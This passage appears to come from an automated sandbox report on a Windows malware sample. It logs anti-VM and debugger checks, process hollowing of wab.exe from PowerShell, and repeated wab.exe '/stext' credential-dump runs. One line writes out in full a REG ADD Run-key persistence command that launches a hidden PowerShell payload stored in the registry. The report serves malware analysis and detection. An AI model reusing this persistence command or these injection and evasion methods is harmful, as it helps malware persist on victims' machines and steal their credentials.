              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6361Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3474Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2194Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7052Thread sleep count: 2194 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2194 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: Amcache.hve.18.drBinary or memory string: VMware
              Source: wab.exe, 00000007.00000002.2877594254.000000000550B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
              Source: Amcache.hve.18.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.18.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.18.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.18.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.18.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.18.drBinary or memory string: vmci.sys
              Source: Amcache.hve.18.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.18.drBinary or memory string: VMware20,1
              Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3605
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeAPI call chain: ExitProcess graph end nodegraph_0-3600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Maps a DLL or memory area into another process
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\reg.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: unknown protection: execute and read and writeJump to behavior
              Sample uses process hollowing technique
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: unknown base address: 400000Jump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 293F958Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sreexoebkgcaarsayfwsrzyyowbcnlfz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtkx"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fnphyzzx"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xtjcxb"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hvonqtlzm"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\sptgqmvszidsb"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zaaaovlz"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\juftpowalcj"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mxslqghuzktmmh"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
